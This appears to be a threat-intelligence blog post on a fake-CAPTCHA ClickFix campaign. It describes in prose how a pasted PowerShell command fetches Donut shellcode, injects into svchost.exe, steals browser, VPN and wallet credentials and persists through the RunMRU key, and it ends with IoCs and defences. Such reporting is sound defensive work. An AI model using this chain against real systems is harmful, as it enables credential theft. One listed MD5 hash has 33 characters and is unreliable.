Fake CAPTCHA ClickFix Campaign Uncovered: Cybercriminals Deploy In-Memory Infostealer via PowerShell and Process Injection

CyberDefender 6 mins0

A recent targeted campaign leveraging fake CAPTCHA pages—part of the broader ClickFix social engineering technique—was investigated by CyberProof’s MDR and Threat Hunting teams. This campaign delivers an infostealer malware that performs extensive credential harvesting and is notable for its multi-stage delivery chain and advanced evasion behavior. The attack displays strong similarities to earlier ClickFix campaigns seen in 2025 that abused fake CAPTCHAs as an initial access vector.

1. Attack Chain Overview

1.1 Initial Access

  • The campaign begins when a user visits a compromised website hosting a deceptive CAPTCHA page designed to mimic legitimate human-verification services.
  • These fake challenges convince the victim to interact with a lookalike web page, triggering a malicious PowerShell command execution.

1.2 Execution & Payload Delivery

  • User executes a PowerShell command (often by copying from the fake CAPTCHA page and pasting into the Windows Run dialog).
  • The initial PowerShell script reaches out to attacker-controlled infrastructure (e.g., IP 91.92.240.219) to download a binary (cptch.bin).
  • The downloaded binary is a position-independent shellcode produced with the Donut tool, enabling a .NET assembly or executable to run directly in memory without touching disk.

1.3 In-Memory Loader & Process Injection

  • After downloading, the shellcode allocates memory and performs process injection into a legitimate system process such as svchost.exe.
  • This in-memory process hides malicious activity from many file-based defenses.
  • The injected code then loads further payloads or modules that carry out credential harvesting and system profiling.

1.4 Targeted Data & Reconnaissance

Once running in memory, the malware is configured to target a broad set of sensitive data and applications:

  • Browser credentials across ~25 browsers (Chrome, Edge, Brave, Opera, Tor, etc.)
  • VPN configurations (e.g., NordVPN, Mullvad, OpenVPN)
  • Cryptocurrency wallets (e.g., MetaMask, Exodus, Electrum)
  • Gaming platforms and other apps
    These targets are selected to maximize credential stealing and system compromise value.

2. Persistence Mechanisms

  • An unusual persistence method involves altering the RUNMRU registry key, which causes PowerShell to re-execute the original download command on reboot.
  • This is effective because the RUNMRU key tracks past Run dialog entries, and abuse of this mechanism ensures automatic reinfection.

3. Evasion and Anti-Detection

Key strategies used to evade detection include:

  • In-memory execution: Using shellcode loaded via Donut to avoid disk artifacts.
  • Process injection: Malicious code runs inside svchost.exe, blending with benign system processes.
  • Remote payload hosting: Different payload binaries hosted under attacker-controlled IPs to avoid signature-based detection.

4. Indicators of Compromise (IoCs)

CyberProof identified several IoCs that defenders can use:

IP Addresses

  • 91.92.240[.]219
  • 94.154.35[.]115
  • 178.16.53[.]70

Domain

  • pinmaha[.]com

Hashes (MD5)

  • fe4a3fb1a48bbdea986e05d1459f925e
  • f50846dcf09c0ebf99bb128eb3f28c1db
  • a3cff7d2ef600d58bca156de0b299d88

5. Defensive Recommendations

To protect against this type of attack:

5.1 Endpoint & Execution Controls

  • Group Policy Restrictions: Disable Run dialog access (Win+R) or remove it from the Start Menu to prevent user-initiated malicious command execution.
  • App Control Policies: Block unauthorized PowerShell execution, especially when initiated from user contexts.
  • Script Execution Policies: Configure PowerShell to only allow signed scripts (AllSigned or RemoteSigned).

5.2 Detection & Logging

  • Enable Script Block Logging in PowerShell to capture malicious scripts for audit and investigation.
  • Behavioral Alerts: Monitor for unusual API calls (e.g., CClipDataObject::GetData) associated with clipboard abuse.

5.3 User Awareness

  • Train users to recognize social engineering cues, especially fake CAPTCHAs that ask them to copy/paste commands into system dialogs.

Wrap-Up

The CyberProof report reinforces that the ClickFix social engineering vector remains a high-risk threat. The combination of deceptive UX (fake CAPTCHA), memory-only execution, credential harvesting breadth, and persistence via the RUNMRU registry makes this campaign particularly notable. Security teams should treat fake CAPTCHA-style social engineering not as a minor nuisance but as a credible initial compromise channel that can bypass traditional signature-based defenses.

CyberDefender